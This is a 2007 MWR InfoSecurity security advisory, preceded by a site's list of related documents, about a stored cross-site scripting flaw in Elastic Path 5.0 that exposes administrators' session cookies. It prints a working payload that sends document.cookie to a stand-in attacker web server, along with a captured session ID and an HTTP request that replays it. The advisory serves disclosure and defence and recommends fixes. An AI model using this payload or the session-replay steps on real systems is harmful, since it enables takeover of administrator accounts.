MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

Similar documents
MWR InfoSecurity Security Advisory. DotNetNuke Cross Site Request Forgery Vulnerability Contents

MWR InfoSecurity Security Advisory. IBM Lotus Domino Accept- Language Stack Overflow. 20 th May Contents

MWR InfoSecurity Security Advisory. Oracle Enterprise Manager SQL Injection Advisory. 1 st February 2010

MWR InfoSecurity Security Advisory. IBM WebSphere MQ - rrilookupget Remote Denial of Service Vulnerability. 4th March 2010

12 th January MWR InfoSecurity Security Advisory. WebSphere MQ xcsgetmem Heap Overflow Vulnerability. Contents

MWR InfoSecurity Security Advisory. IBM WebSphere MQ - rridecompress Remote Denial of Service Vulnerability. 4th March 2010

MWR InfoSecurity Security Advisory. IBM Lotus Domino icalendar Address Stack Buffer Overflow Vulnerability. 14 th September 2010

MWR InfoSecurity Security Advisory. Sophos RMS / TAO Component DoS Vulnerability. 16 th January Contents

MWR InfoSecurity Security Advisory. Intersystems Caché CSP (Caché Server Pages) Stack Overflow. 17 th December 2009

CSCE 813 Internet Security Case Study II: XSS

MWR InfoSecurity Security Advisory. Linux USB Device Driver - Buffer Overflow. 29 th October Contents

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

CIS 4360 Secure Computer Systems XSS

Common Websites Security Issues. Ziv Perry

Web Application Security GVSAGE Theater

Web basics: HTTP cookies

Web Security, Part 2

::/Topics/Configur...

World Wide Web, etc.

Title: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs)

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)

MWR InfoSecurity Security Advisory. Mozilla Firefox 64-Bit SetTextInternal () Heap Buffer Overflow. 23 rd June 2010

Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability

HTTP Protocol and Server-Side Basics

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

WebGoat& WebScarab. What is computer security for $1000 Alex?

Parameterization in OpenSTA for load testing. Parameterization in OpenSTA Author: Ranjit Shewale

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

CS 5450 HTTP. Vitaly Shmatikov

WatchGuard AP - Remote Code Execution

C1: Define Security Requirements

CSCD 303 Essential Computer Security Fall 2018

Web Search An Application of Information Retrieval Theory

Applications & Application-Layer Protocols: The Web & HTTP

Application Security through a Hacker s Eyes James Walden Northern Kentucky University


RKN 2015 Application Layer Short Summary

The TCPProxy. Table of contents

s642 web security computer security adam everspaugh

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

Secure Parameter Filter (SPF) (AKA Protecting Vulnerable Applications with IIS7) Justin Clarke, Andrew Carey Nairn

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Web Application Whitepaper

Application vulnerabilities and defences

Penetration Test Report

The security of Mozilla Firefox s Extensions. Kristjan Krips

COMP9321 Web Application Engineering

Content Security Policy

Why bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?

WEB SECURITY: XSS & CSRF

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Brave New 64-Bit World. An MWR InfoSecurity Whitepaper. 2 nd June Page 1 of 12 MWR InfoSecurity Brave New 64-Bit World

Web Application Firewall Subscription on Cyberoam UTM appliances

Chrome Extension Security Architecture

OWASP TOP 10. By: Ilia

Bank Infrastructure - Video - 1

Web Application Security. Philippe Bogaerts

Web Security: Cross-Site Attacks

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

Exploiting and Defending: Common Web Application Vulnerabilities

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

Inspect a Gadget. Rafael Dominguez Vega. FIST Conference 26 th October 2007 Barcelona

Evaluating the Security Risks of Static vs. Dynamic Websites

Web Application Security

CSCD 303 Essential Computer Security Fall 2017

Presented By Rick Deacon DEFCON 15 August 3-5, 2007

Introduction to Ethical Hacking

COMP9321 Web Application Engineering

Cross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security

Web Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs

Notes From The field

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Solutions Business Manager Web Application Security Assessment

Tabular Presentation of the Application Software Extended Package for Web Browsers

Information Security CS 526 Topic 11

Copyright

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Multi-Post XSRF Web App Exploitation, total pwnage

Security in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren

Origin Policy Enforcement in Modern Browsers

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Web Application Penetration Testing

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Web Security, Summer Term 2012

Web Security, Summer Term 2012

Don t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel

TIBCO Cloud Integration Security Overview

GOING WHERE NO WAFS HAVE GONE BEFORE

Portcullis Computer Security.

Crowds Anonymous Web Transactions. Why anonymity?

Secure Frame Communication in Browsers Review

Web Gate Keeper: Detecting Encroachment in Multi-tier Web Application

HashCookies A Simple Recipe

Transcription:

Quit MWR InfoSecurity Advisory Elastic Path Administrative Session Hijacking through Embedded XSS 26 th April 2007 2007-04-26 1 of 7

INDEX 1 Detailed Vulnerability description...4 1.1 Introduction...4 1.2 Overview of Vulnerability...4 1.3 Exploit Information...4 1.4 Dependencies...5 1.5 Recommendations...5 2007-04-26 2 of 7

Elastic Path Administrative Session Hijacking through Embedded XSS CVE Reference: Not yet submitted Date: 2007-04-26 Author: R Dominguez Vega Severity: High Risk Local/Remote: Remote Vulnerability Class: XSS / Unauthorised Administrative Application Access Vendor URL: www.elasticpath.com Vendor Response: A fix has been implemented for version 5.1.1 Exploit Details Included: Yes OWASP Designation: Cross Site Scripting (A4) Web Application Language: JAVA Affected Versions: 5.0, earlier versions have not been tested. Impact: Elastic Path has been identified to be vulnerable to an embedded Cross Site Scripting attack that could potentially allow remote attackers to hijack a legitimate administrator s session cookie. An attacker could exploit this vulnerability to gain unauthorised access to the Elastic Path Commerce Manager and obtain administrative privileges. Overview: Cross Site Scripting (XSS) is a technique whereby the content of a web application can be manipulated so that HTML or JavaScript is inserted into the page returned to the user. This code will execute within the context of the user s session and will have access to information such as session cookies. The scope of XSS attacks is often only limited by the creativity of the person performing them. The most dangerous form of XSS involves the hostile code being permanently stored within the application. This means the embedded code would be executed by every user accessing the affected page. The Elastic Path vulnerability is present because of a lack of sufficient sanitisation on arguments passed from a web application that uses Elastic Path as an e-commerce manager, to the Elastic Path Commerce Manager application. Cause: The exploitation of this vulnerability is possible because the Elastic Path Commerce Manager does not properly sanitise parameters that are passed to it. If a script is passed to one of the parameters from any e-commerce web page, the script is embedded into the Elastic Path Commerce Manager and therefore is returned to the administrator s browser in the server response and executed. Interim Workaround: None Solution: Elastic Path have addressed this vulnerability and implemented a fix in version 5.1.1. This version has not been tested. 2007-04-26 3 of 7

1 Detailed Vulnerability description 1.1 Introduction Elastic Path is a Java e-commerce software platform for building online stores and shopping carts. This software is used by businesses to manage their e-commerce. Features such as a search engine, merchandising, payment, tax, customer management, order management, etc. are included in the Elastic Path manager. 1.2 Overview of Vulnerability The embedded XSS vulnerability was identified in the First Name and Last Name fields when viewing user s details. An attacker could inject JavaScript into these fields in any e- commerce application that uses Elastic Path to manage their application and this would be executed by the Elastic Path manager when an administrator views this particular user s details. This JavaScript could connect and send the administrator s cookie to the attacker s web server. This cookie could then be used by the attacker to hijack the authenticated user session on the Elastic Path server and gain full access to the administrator Elastic Path account. Additionally, opportunities for XSS attacks have also been identified in the forgotten password functionality and in the Store Front. It is recommended that these are resolved as detailed in the Recommendations section. A screenshot of a JavaScript alert box being rendered on the Elastic Path manager page is included here: - 1.3 Exploit Information 2007-04-26 4 of 7

This vulnerability could be exploited in large number of ways; as mentioned above, the main limitation would be the creativity of the person performing the attack. However, one simple method of performing this attack is outlined below: - 1. The attacker would register or update his fake customer details in an e-commerce application that is managed by Elastic Path. The following malicious JavaScript is entered into one of the affected parameters (first name or last name): - <b onmouseover="window.location.href='http://attacker-webserver/'+document.cookie;">name</b> 2. At this stage the script will already be embedded and would be executed by the administrator once the mouse is moved over the name or surname of the attacker, when viewing the attacker s details. 3. Once the JavaScript is executed, the administrator s session cookie would be transmitted to the attacker s web server and could be viewed in the access log file as included here: - "GET /JSESSIONID=C63F4DD2FC11743B3796390B17B30319 HTTP/1.1" 404 1084 4. The attacker can then use the administrator s cookie to access his authenticated session in the Elastic Path server. The attacker would submit the following request to the Elastic Path server and replace the cookie with the captured cookie: - GET /ep5cm/index.ep HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xshockwave-flash, application/vnd.ms-excel, application/msword, application/vnd.mspowerpoint, */* Accept-Language: en-us Cookie: JSESSIONID=C63F4DD2FC11743B3796390B17B30319 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;.NET CLR 1.1.4322) Host: localhost:11080 Proxy-Connection: Keep-Alive 1.4 Dependencies This attack would not be possible if the e-commerce application that uses Elastic Path did not allow JavaScript to be injected in the First Name or Last Name fields when registering or updating users details. 1.5 Recommendations It is recommended that the application code be redesigned such that all user input is subject to strict input validation. All input variables must be checked against specific data types with all unauthorised input being rejected. An additional protection should also be added by HTML encoding all data that is returned to the user. This would form part of a layered security model that provides greater defence against attacks that bypass input validation. This can be achieved by enforcing the following approaches: - Filtering special characters such as < > ( ) & By using HTML-encode equivalents. These will never be executed by the web browser. 2007-04-26 5 of 7

Adjusting the allowed number of characters and data type(s) in fields according to the data requested. Typically a certain number of characters is needed to be able to perform the XSS session hijack. Setting the HTTPOnly parameter on the cookie, thereby disabling access to the document.cookie method. It should be noted that this sanitisation must be performed client side as well as server side, to avoid filtering rules being bypassed by the use of in line proxies. It is also recommended that once this issue has been resolved, all Elastic Path users should be contacted and advised to upgrade to the latest version or patch. 2007-04-26 6 of 7

MWR InfoSecurity St. Clement House 1-3 Alencon Link Basingstoke, RG21 7SB Tel: +44 (0)1256 300920 Fax: +44 (0)1256 844083 mwrinfosecurity.com

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback